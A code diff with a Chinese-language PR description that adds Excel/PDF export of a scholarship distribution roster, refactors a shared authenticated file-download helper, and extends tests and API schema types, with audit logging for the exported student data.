+    expect(rows[1]).toHaveTextContent("李二");
+    // The panel reuses this array; sorting it in place would reorder its state.
+    expect(original.map((s) => s.student_name)).toEqual(["李二", "王一"]);
+  });
+
+  it("shows the group heading with label, raw code and 年度配額", () => {
+    render(<DistributionSummaryDialog {...defaults} summary={summary()} isLoading={false} />);
+    expect(screen.getByText("國科會")).toBeInTheDocument();
+    expect(screen.getByText("(nstc)")).toBeInTheDocument();
+    expect(screen.getByText("114 年度配額")).toBeInTheDocument();
+  });
+
+  it("exports xlsx with the current selection and triggers the download", async () => {
+    render(<DistributionSummaryDialog {...defaults} summary={summary()} isLoading={false} />);
+    await clickExportItem("匯出 Excel");
+
+    await waitFor(() => expect(mockExport).toHaveBeenCalledTimes(1));
+    expect(mockExport).toHaveBeenCalledWith({
+      scholarshipTypeId: 7,
+      academicYear: 114,
+      semester: "yearly",
+      format: "xlsx",
+    });
+    expect(mockTriggerBlobDownload).toHaveBeenCalledWith({
+      blob: expect.any(Blob),
+      filename: "分發名單.xlsx",
+    });
+    expect(mockToast.success).toHaveBeenCalledWith("匯出成功");
+  });
+
+  it("passes format=pdf through for the PDF item", async () => {
+    render(<DistributionSummaryDialog {...defaults} summary={summary()} isLoading={false} />);
+    await clickExportItem("匯出 PDF");
+
+    await waitFor(() => expect(mockExport).toHaveBeenCalledTimes(1));
+    expect(mockExport.mock.calls[0][0].format).toBe("pdf");
+  });
+
+  it("surfaces the backend message when the export fails", async () => {
+    mockExport.mockRejectedValue(new Error("尚未完成分發，無法匯出"));
+    render(<DistributionSummaryDialog {...defaults} summary={summary()} isLoading={false} />);
+    await clickExportItem("匯出 Excel");
+
+    await waitFor(() =>
+      expect(mockToast.error).toHaveBeenCalledWith("尚未完成分發，無法匯出")
+    );
+    expect(mockTriggerBlobDownload).not.toHaveBeenCalled();
+  });
+
+  it("disables 匯出 when there is nothing to export", () => {
+    render(
+      <DistributionSummaryDialog
+        {...defaults}
+        summary={{ groups: [], total_allocated: 0 }}
+        isLoading={false}
+      />
+    );
+    expect(screen.getByRole("button", { name: /匯出/ })).toBeDisabled();
+    expect(screen.getByText("尚未完成分發，或無已分配的學生")).toBeInTheDocument();
+  });
+
+  it("tells the admin to pick a year instead of silently no-opping", async () => {
+    render(
+      <DistributionSummaryDialog
+        {...defaults}
+        academicYear={undefined}
+        summary={summary()}
+        isLoading={false}
+      />
+    );
+    await clickExportItem("匯出 Excel");
+
+    await waitFor(() =>
+      expect(mockToast.error).toHaveBeenCalledWith("請先選擇學年度與學期")
+    );
+    expect(mockExport).not.toHaveBeenCalled();
+  });
+
+  it("renders a red N instead of the rank for a college-rejected row", () => {
+    const data = summary();
+    data.groups[0].students[1].college_rejected = true;
+    render(<DistributionSummaryDialog {...defaults} summary={data} isLoading={false} />);
+    expect(screen.getByText("N")).toBeInTheDocument();
+  });
+
+  it("closes via the footer button", () => {
+    const onClose = jest.fn();
+    render(
+      <DistributionSummaryDialog {...defaults} onClose={onClose} summary={summary()} isLoading={false} />
+    );
+    fireEvent.click(screen.getByRole("button", { name: "關閉" }));
+    expect(onClose).toHaveBeenCalledTimes(1);
+  });
+});

--- a/frontend/lib/api/generated/schema.d.ts
+++ b/frontend/lib/api/generated/schema.d.ts
@@ -7693,6 +7693,36 @@ export interface paths {
         patch?: never;
         trace?: never;
     };
+    "/api/v1/manual-distribution/distribution-summary/export": {
+        parameters: {
+            query?: never;
+            header?: never;
+            path?: never;
+            cookie?: never;
+        };
+        /**
+         * Export Distribution Summary
+         * @description Export the 分發結果名單 as Excel (default) or PDF — 受獎名冊 layout.
+         *
+         *     Reads through the SAME ``_load_allocated_groups`` loader as the JSON
+         *     endpoint, so the file can never show a student the panel would not.
+         *
+         *     Carries no 身分證字號 and no 匯款帳號, but it is NOT the PII-free case the
+         *     college 分發結果 export is: on top of 學號/姓名/系所 it emits 國籍, 性別,
+         *     碩士畢業院/校/系所 and 首次註冊入學日期, plus three derived flags that label a
+         *     student as 在職生 / 陸港澳生 / 休學. That is personal data about identified
+         *     students leaving the system in bulk, so it writes a ``pii_access`` AuditLog
+         *     like the 學生資料彙整表 export does.
+         */
+        get: operations["export_distribution_summary_api_v1_manual_distribution_distribution_summary_export_get"];
+        put?: never;
+        post?: never;
+        delete?: never;
+        options?: never;
+        head?: never;
+        patch?: never;
+        trace?: never;
+    };
     "/api/v1/manual-distribution/generate-rosters-from-distribution": {
         parameters: {
             query?: never;
@@ -23509,6 +23539,41 @@ export interface operations {
                 scholarship_type_id: number;
                 academic_year: number;
                 semester: string;
+            };
+            header?: never;
+            path?: never;
+            cookie?: never;
+        };
+        requestBody?: never;
+        responses: {
+            /** @description Successful Response */
+            200: {
+                headers: {
+                    [name: string]: unknown;
+                };
+                content: {
+                    "application/json": unknown;
+                };
+            };
+            /** @description Validation Error */
+            422: {
+                headers: {
+                    [name: string]: unknown;
+                };
+                content: {
+                    "application/json": components["schemas"]["HTTPValidationError"];
+                };
+            };
+        };
+    };
+    export_distribution_summary_api_v1_manual_distribution_distribution_summary_export_get: {
+        parameters: {
+            query: {
+                scholarship_type_id: number;
+                academic_year: number;
+                semester: string;
+                /** @description Output format: xlsx (default) or pdf */
+                format?: "xlsx" | "pdf";
             };
             header?: never;
             path?: never;

--- a/frontend/lib/api/modules/__tests__/college.test.ts
+++ b/frontend/lib/api/modules/__tests__/college.test.ts
@@ -10,7 +10,7 @@
  * shapes, default-value preservation (force_new ?? false),
  * legacy-vs-unified review path distinction, and the binary-
  * export Content-Disposition filename extraction + error
- * fallback chain in _fetchBinaryExport.
+ * fallback chain in fetchBinaryExport (lib/api/modules/binary-export.ts).
  *
  * 24 cases.
  */
@@ -413,7 +413,7 @@ describe("createCollegeApi", () => {
   });
 });
 
-// ─── Module-level export helpers (use shared _fetchBinaryExport) ────
+// ─── Module-level export helpers (use shared fetchBinaryExport) ─────
 
 describe("module-level export helpers", () => {
   it("exportRankingExcel uses Bearer header + extracts filename* UTF-8 encoded", async () => {
@@ -518,7 +518,7 @@ describe("module-level export helpers", () => {
     expect(result.filename).toBe("申請總表.zip");
   });
 
-  it("_fetchBinaryExport (via exportRankingExcel) propagates backend detail on non-OK", async () => {
+  it("fetchBinaryExport (via exportRankingExcel) propagates backend detail on non-OK", async () => {
     // Pin: error fallback chain — body.detail → body.message →
     // body.error → fallback "無法匯出排名資料".
     const fetchMock = jest.fn().mockResolvedValue({
@@ -530,7 +530,7 @@ describe("module-level export helpers", () => {
     await expect(exportRankingExcel(42)).rejects.toThrow("no permission");
   });
 
-  it("_fetchBinaryExport falls back to zh-TW when backend body unparseable", async () => {
+  it("fetchBinaryExport falls back to zh-TW when backend body unparseable", async () => {
     const fetchMock = jest.fn().mockResolvedValue({
       ok: false,
       json: jest.fn().mockRejectedValue(new Error("no JSON")),

--- a/frontend/lib/api/modules/__tests__/manual-distribution.test.ts
+++ b/frontend/lib/api/modules/__tests__/manual-distribution.test.ts
@@ -14,6 +14,7 @@
 
 import {
   createManualDistributionApi,
+  exportDistributionSummary,
   isCancelledAllocation,
   mergeSuggestions,
   reasonsBySuggestion,
@@ -599,5 +600,109 @@ describe("reasonsBySuggestion / summarizeReasons", () => {
     expect(
       unallocatedReasonLabel("brand_new_code" as UnallocatedReason)
     ).toBe("brand_new_code");
+  });
+});
+
+// ─── Binary export (shared fetchBinaryExport) ──────────────────────
+
+describe("exportDistributionSummary", () => {
+  const okResponse = (disposition: string) => ({
+    ok: true,
+    headers: { get: jest.fn().mockReturnValue(disposition) },
+    blob: jest.fn().mockResolvedValue(new Blob(["xlsx"])),
+  });
+
+  it("sends the three selection params, Bearer auth, and decodes filename*", async () => {
+    const fetchMock = jest
+      .fn()
+      .mockResolvedValue(
+        okResponse("attachment; filename*=UTF-8''%E5%88%86%E7%99%BC%E5%90%8D%E5%96%AE.xlsx")
+      );
+    global.fetch = fetchMock as unknown as typeof fetch;
+
+    const result = await exportDistributionSummary({
+      scholarshipTypeId: 7,
+      academicYear: 114,
+      semester: "yearly",
+    });
+
+    const url = fetchMock.mock.calls[0][0] as string;
+    expect(url).toContain(
+      "/api/v1/manual-distribution/distribution-summary/export"
+    );
+    expect(url).toContain("scholarship_type_id=7");
+    expect(url).toContain("academic_year=114");
+    expect(url).toContain("semester=yearly");
+    expect(fetchMock.mock.calls[0][1].headers.Authorization).toBe(
+      "Bearer test-token"
+    );
+    expect(result.filename).toBe("分發名單.xlsx");
+  });
+
+  it("omits format for xlsx (URL unchanged) and appends it for pdf", async () => {
+    const fetchMock = jest.fn().mockResolvedValue(okResponse(""));
+    global.fetch = fetchMock as unknown as typeof fetch;
+
+    await exportDistributionSummary({
+      scholarshipTypeId: 7,
+      academicYear: 114,
+      semester: "first",
+    });
+    expect(fetchMock.mock.calls[0][0]).not.toContain("format=");
+
+    await exportDistributionSummary({
+      scholarshipTypeId: 7,
+      academicYear: 114,
+      semester: "first",
+      format: "pdf",
+    });
+    expect(fetchMock.mock.calls[1][0]).toContain("format=pdf");
+  });
+
+  it("falls back to 分發名單_{year}.{ext} without Content-Disposition", async () => {
+    const fetchMock = jest.fn().mockResolvedValue(okResponse(""));
+    global.fetch = fetchMock as unknown as typeof fetch;
+
+    const result = await exportDistributionSummary({
+      scholarshipTypeId: 7,
+      academicYear: 114,
+      semester: "yearly",
+      format: "pdf",
+    });
+    expect(result.filename).toBe("分發名單_114.pdf");
+  });
+
+  it("surfaces the backend message on a non-OK response", async () => {
+    // The 404 branches (尚未完成分發 / 尚無已分配的學生) must reach the toast,
+    // not the generic fallback.
+    const fetchMock = jest.fn().mockResolvedValue({
+      ok: false,
+      json: jest.fn().mockResolvedValue({ message: "尚未完成分發，無法匯出" }),
+    });
+    global.fetch = fetchMock as unknown as typeof fetch;
+
+    await expect(
+      exportDistributionSummary({
+        scholarshipTypeId: 7,
+        academicYear: 114,
+        semester: "yearly",
+      })
+    ).rejects.toThrow("尚未完成分發，無法匯出");
+  });
+
+  it("falls back to zh-TW when the error body is unparseable", async () => {
+    const fetchMock = jest.fn().mockResolvedValue({
+      ok: false,
+      json: jest.fn().mockRejectedValue(new Error("no JSON")),
+    });
+    global.fetch = fetchMock as unknown as typeof fetch;
+
+    await expect(
+      exportDistributionSummary({
+        scholarshipTypeId: 7,
+        academicYear: 114,
+        semester: "yearly",
+      })
+    ).rejects.toThrow("無法匯出分發名單");
   });
 });

--- a/frontend/lib/api/modules/binary-export.ts
+++ b/frontend/lib/api/modules/binary-export.ts
@@ -1,0 +1,58 @@
+/**
+ * Shared authed binary-download fetcher for backend file exports.
+ *
+ * openapi-fetch (typedClient.raw) cannot stream blobs, so every binary export
+ * goes through plain fetch with the JWT attached. Extracted from
+ * lib/api/modules/college.ts when the manual-distribution 分發名單 export became
+ * the second module needing it.
+ *
+ * Returns the file as a Blob plus the filename parsed from the RFC 5987
+ * `Content-Disposition: attachment; filename*=UTF-8''<encoded>` header,
+ * falling back to `fallbackFilename` when the header is missing.
+ */
+
+import { typedClient } from "../typed-client";
+
+export async function fetchBinaryExport(
+  path: string,
+  params: URLSearchParams,
+  fallbackFilename: string,
+  errorFallback: string
+): Promise<{ blob: Blob; filename: string }> {
+  const token = typedClient.getToken();
+  const baseURL =
+    typeof window !== "undefined"
+      ? ""
+      : process.env.INTERNAL_API_URL || "http://localhost:8000";
+
+  const query = params.toString();
+  const url = `${baseURL}${path}${query ? `?${query}` : ""}`;
+
+  const response = await fetch(url, {
+    method: "GET",
+    credentials: "include",
+    headers: {
+      ...(token ? { Authorization: `Bearer ${token}` } : {}),
+    },
+  });
+
+  if (!response.ok) {
+    let message = errorFallback;
+    try {
+      const errorData = await response.json();
+      message = errorData?.detail || errorData?.message || errorData?.error || message;
+    } catch {
+      // Non-JSON error body — keep default.
+    }
+    throw new Error(message);
+  }
+
+  const disposition = response.headers.get("content-disposition") || "";
+  const filenameMatch = disposition.match(/filename\*=UTF-8''([^;]+)/i);
+  const filename = filenameMatch
+    ? decodeURIComponent(filenameMatch[1].trim())
+    : fallbackFilename;
+
+  const blob = await response.blob();
+  return { blob, filename };
+}

--- a/frontend/lib/api/modules/college.ts
+++ b/frontend/lib/api/modules/college.ts
@@ -15,6 +15,7 @@ import { typedClient } from "../typed-client";
 import { toApiResponse } from "../compat";
 import type { ApiResponse } from "../types";
 import type { components as SchemaComponents } from "../generated/schema";
+import { fetchBinaryExport } from "./binary-export";
 
 // Shared PATCH for the per-config admin toggles (supplementary-import, college-view-distribution):
 // both flip one boolean on a ScholarshipConfiguration via the same auth + error-unwrap path.
@@ -699,49 +700,8 @@ export function createCollegeApi() {
   };
 }
 
-async function _fetchBinaryExport(
-  path: string,
-  params: URLSearchParams,
-  fallbackFilename: string,
-  errorFallback: string
-): Promise<{ blob: Blob; filename: string }> {
-  const token = typedClient.getToken();
-  const baseURL =
-    typeof window !== "undefined"
-      ? ""
-      : process.env.INTERNAL_API_URL || "http://localhost:8000";
-
-  const query = params.toString();
-  const url = `${baseURL}${path}${query ? `?${query}` : ""}`;
-
-  const response = await fetch(url, {
-    method: "GET",
-    credentials: "include",
-    headers: {
-      ...(token ? { Authorization: `Bearer ${token}` } : {}),
-    },
-  });
-
-  if (!response.ok) {
-    let message = errorFallback;
-    try {
-      const errorData = await response.json();
-      message = errorData?.detail || errorData?.message || errorData?.error || message;
-    } catch {
-      // Non-JSON error body — keep default.
-    }
-    throw new Error(message);
-  }
-
-  const disposition = response.headers.get("content-disposition") || "";
-  const filenameMatch = disposition.match(/filename\*=UTF-8''([^;]+)/i);
-  const filename = filenameMatch
-    ? decodeURIComponent(filenameMatch[1].trim())
-    : fallbackFilename;
-
-  const blob = await response.blob();
-  return { blob, filename };
-}
+// The shared authed binary fetcher lives in binary-export.ts (also used by the
+// manual-distribution 分發名單 export).
 
 /**
  * Download the 學生資料彙整表 for a college ranking, as Excel (default) or PDF.
@@ -760,7 +720,7 @@ export async function exportRankingExcel(
 ): Promise<{ blob: Blob; filename: string }> {
   const params = new URLSearchParams();
   if (format !== "xlsx") params.set("format", format);
-  return _fetchBinaryExport(
+  return fetchBinaryExport(
     `/api/v1/college-review/rankings/${rankingId}/export-excel`,
     params,
     `學生資料彙整表_${rankingId}.${format}`,
@@ -780,7 +740,7 @@ export async function downloadRankingTemplate(
 ): Promise<{ blob: Blob; filename: string }> {
   const params = new URLSearchParams();
   params.set("template", "true");
-  return _fetchBinaryExport(
+  return fetchBinaryExport(
     `/api/v1/college-review/rankings/${rankingId}/export-excel`,
     params,
     `學生資料彙整表_${rankingId}_範本.xlsx`,
@@ -807,7 +767,7 @@ export async function exportDistributionResults(params: {
   search.set("academic_year", String(params.academicYear));
   if (params.semester) search.set("semester", params.semester);
   if (format !== "xlsx") search.set("format", format);
-  return _fetchBinaryExport(
+  return fetchBinaryExport(
     "/api/v1/college-review/distribution-results/export",
     search,
     `分發結果_${params.academicYear}.${format}`,
@@ -835,7 +795,7 @@ export async function exportDepartmentSummary(
   if (args.semester) params.set("semester", args.semester);
   params.set("department_code", args.department_code);
 
-  return _fetchBinaryExport(
+  return fetchBinaryExport(
     "/api/v1/college-review/applications/department-summary-export",
     params,
     "申請總表.xlsx",
@@ -863,7 +823,7 @@ export async function exportDepartmentSummaryBulk(
   params.set("scope", args.scope);
   if (args.academy_code) params.set("academy_code", args.academy_code);
 
-  return _fetchBinaryExport(
+  return fetchBinaryExport(
     "/api/v1/college-review/applications/department-summary-export-bulk",
     params,
     "申請總表.zip",

--- a/frontend/lib/api/modules/manual-distribution.ts
+++ b/frontend/lib/api/modules/manual-distribution.ts
@@ -8,6 +8,7 @@
 import { typedClient } from "../typed-client";
 import { toApiResponse } from "../compat";
 import type { ApiResponse } from "../types";
+import { fetchBinaryExport } from "./binary-export";
 
 /** One reviewer verdict for one sub-type, shown in the 教授推薦/學院推薦 columns. */
 export interface ReviewItemSummary {
@@ -836,4 +837,34 @@ export function createManualDistributionApi() {
       return body as ApiResponse<unknown>;
     },
   };
+}
+
+/**
+ * Download the 分發結果名單 (受獎名冊) as Excel (default) or PDF.
+ *
+ * Endpoint: GET /api/v1/manual-distribution/distribution-summary/export
+ *   `format` is an OPTIONAL query param: "pdf" appends `?format=pdf`; the
+ *   default "xlsx" is omitted entirely, so the xlsx request URL is unchanged.
+ *
+ * Binary exports bypass typedClient.raw (openapi-fetch cannot stream blobs) —
+ * see lib/api/modules/binary-export.ts.
+ */
+export async function exportDistributionSummary(params: {
+  scholarshipTypeId: number;
+  academicYear: number;
+  semester: string;
+  format?: "xlsx" | "pdf";
+}): Promise<{ blob: Blob; filename: string }> {
+  const format = params.format ?? "xlsx";
+  const search = new URLSearchParams();
+  search.set("scholarship_type_id", String(params.scholarshipTypeId));
+  search.set("academic_year", String(params.academicYear));
+  search.set("semester", params.semester);
+  if (format !== "xlsx") search.set("format", format);
+  return fetchBinaryExport(
+    "/api/v1/manual-distribution/distribution-summary/export",
+    search,
+    `分發名單_${params.academicYear}.${format}`,
+    "無法匯出分發名單"
+  );
 }


### PR DESCRIPTION
## 摘要

管理員「獎學金分發 → 查看分發名單」現在可以匯出 **Excel** 與 **PDF**，版面依國科會「補助大學校院推動研究生獎學金試辦方案」**受獎博士生名冊**：

`序號` / `基本資料`（學院・系所・姓名・國籍・性別・碩士畢業院/校/系所）/ `學籍資料`（受獎博士生首次註冊入學日期・學號）/ `請領資格檢核`

`請領資格檢核` 欄位**留空**由承辦人填寫 —— 第四款（已支領同屬政府部門獎學金）學籍 API 完全無從得知。另外新增三個欄位，自動判定學籍資料**可以**回答的部分：

| 欄位 | 判定依據 | 備註 |
|---|---|---|
| 1. 於公私立機構從事專職全時之有給職工作或以在職生身分報考者 | `std_schoolid == 2`，或 `std_enrolltype ∈ {2, 5}` | 只涵蓋「在職生」那半段；校外任職學籍系統沒有此欄位 |
| 2. 以香港、澳門及大陸地區學生身分入學者 | `std_identity == 17`、`std_enrolltype == 17`，加上 `std_nation`／`std_overseaplace` 子字串比對 | `identities` 表**沒有**港澳代碼，只能靠自由文字 |
| 3. 錄取後辦理休學、保留入學資格或未完成註冊者 | `trm_studystatus` 或 `std_studingstatus ∈ {4, 9, 10}` | 兩個欄位任一命中即標記 |

每格顯示 `有` / `無` / `無法檢核`，最後一種用於快照缺少該欄位時 —— 不會靜默地當成 `無`。

> [!IMPORTANT]
> 這三欄讀的是**申請當時**的 `student_data` 快照，不是即時 API。獲獎後才休學的學生在此仍顯示 `無`，因此欄位群組標明「依申請時學籍資料自動判定」，且官方的 `請領資格檢核` 欄位仍留給承辦人。造冊流程本身會用即時 API 重新驗證。

## 後端

- 新增 `GET /api/v1/manual-distribution/distribution-summary/export?format=xlsx|pdf`（admin only）。與 JSON 版 `distribution-summary` 共用新的 `_load_allocated_groups` loader，**檔案不可能顯示畫面上看不到的學生**。尚未分發／無已分配學生時回 404。
- **排序改為「學院 → 名次」**：`rank_position` 是各學院 ranking 內的名次，單純依它排序會讓學院交錯（工學院 #1、電機 #1、工學院 #2…），讀起來像是全校統一排名。
- **寫入 `pii_access` AuditLog**。檔案不含身分證字號／匯款帳號，但除了學號/姓名/系所外還有國籍、性別、碩士畢業校系，以及會把學生標記為在職生／陸港澳生／休學的判定欄 —— 比原先引用的「學院分發結果匯出（無 PII）」前例範圍更廣。
- **所有學籍欄位改走 `_as_int` / `_as_text`**。`student_data` 是原始 API JSON，而學校 API 這些代碼是**字串**（見 `mock-student-api/README.md`），因此：
  - `std_enrollterm` 直接 `== 1` 會讓**所有九月入學的學生印成二月**；
  - 對數字型系所代碼呼叫 `.strip()` 會 `AttributeError`，**整份匯出 500**。
  - `ManualDistributionService._format_enrollment_date` 改為委派至此，畫面與匯出不可能不一致。
- 子類型名稱由 `ScholarshipSubTypeConfig` 解析（fallback 為原始 code），不用寫死的對照表，config-driven 的子類型可原樣通過。
- **抽出 `export_table_chassis`**（PDF styles、KeepInFrame cells、框線/欄寬）—— 原檔註解明確要求「第三個匯出服務不要再 fork，請抽共用底盤」，並將 `college_distribution_export_service` 遷移過去。
- 將 `sanitise_filename_part` 與 media type 常數抽到 `app/utils/export_download`，不再跨 package import 私有名稱。
- 國科會欄位版面**刻意寫死、不做成設定**：它照抄外部政府表單，若可由設定修改，一次設定變更就可能產出國科會不接受的名冊。已在 module docstring 說明，並註明若未來有第二種官方表單，應「依獎學金類型選擇 renderer」而非參數化欄位。

## 前端

- 把 2764 行 panel 內的「分發結果名單」modal 抽成 `DistributionSummaryDialog`，並加入 `匯出 Excel / PDF` dropdown。
- 把 `fetchBinaryExport` 從 `college.ts` 抽到 `binary-export.ts` 共用。
- 移除工具列上那顆從 `cb9c5d3a` 起就永久 disabled 的「匯出 Excel」佔位按鈕 —— 真正的匯出已在它該在的 dialog 內。
- JSON summary payload 補上 `college_rejected` / `is_supplementary`：畫面本來就有渲染分支，但後端從來沒送過。

## 測試

| 範圍 | 結果 |
|---|---|
| Backend unit lane | 3355 passed |
| Backend integration lane | 1731 passed |
| Frontend (108 suites) | 1497 passed |
| `black --line-length=120 backend/app` | 644 files clean |
| `flake8 --select=B904,B014` | clean |
| `tsc --noEmit` / `eslint` | clean |

新增測試針對 review 指出的弱點：

- PDF 測試改為**抽出文字**驗證標題／兩列表頭／資料列／每群組分頁／長名單 60 列全在 —— 原本只驗 `%PDF` magic bytes，經 mutation 驗證「把每一列都丟掉」的 renderer 五個測試全數通過。
- 三組判定代碼都加了**負向邊界測試**，任何一組被放寬都會讓 CI 失敗。
- 多群組排序、完整 JSON payload 形狀、`DistributionSummaryDialog` component test。
- 一併修正 `backend/CLAUDE.md` 的 integration lane glob —— 它寫的是 `test_*_service*.py`，而 `ci.yml` 自己的註解記載那正是它修掉的 bug。

## 驗證方式

實際產出的 xlsx／PDF 已人工檢查：兩列群組表頭與合併正確、xlsx 每個分發群組一張工作表、PDF 每群組一段分頁、CJK 字型正常，且三個判定欄各自在正確的學生列上命中。工作表命名的邊界情況（超長名稱、重複、空值、開頭單引號、`=` 開頭）都會產生合法且唯一的名稱。

## 需要 reviewer 確認

1. **`序號` 為整份文件連續編號**（不是每張工作表從 1 重新開始）—— 請確認這是國科會期望的編號方式。
2. **港澳缺代碼**：`identities` 表只有陸生（17），沒有香港/澳門。第 2 欄的港澳部分只能靠 `std_nation` / `std_overseaplace` 自由文字比對，且現有 fixture 都沒有港澳值 —— 正式採用前建議對照真實學籍 API 確認。

🤖 Generated with [Claude Code](https://claude.com/claude-code)
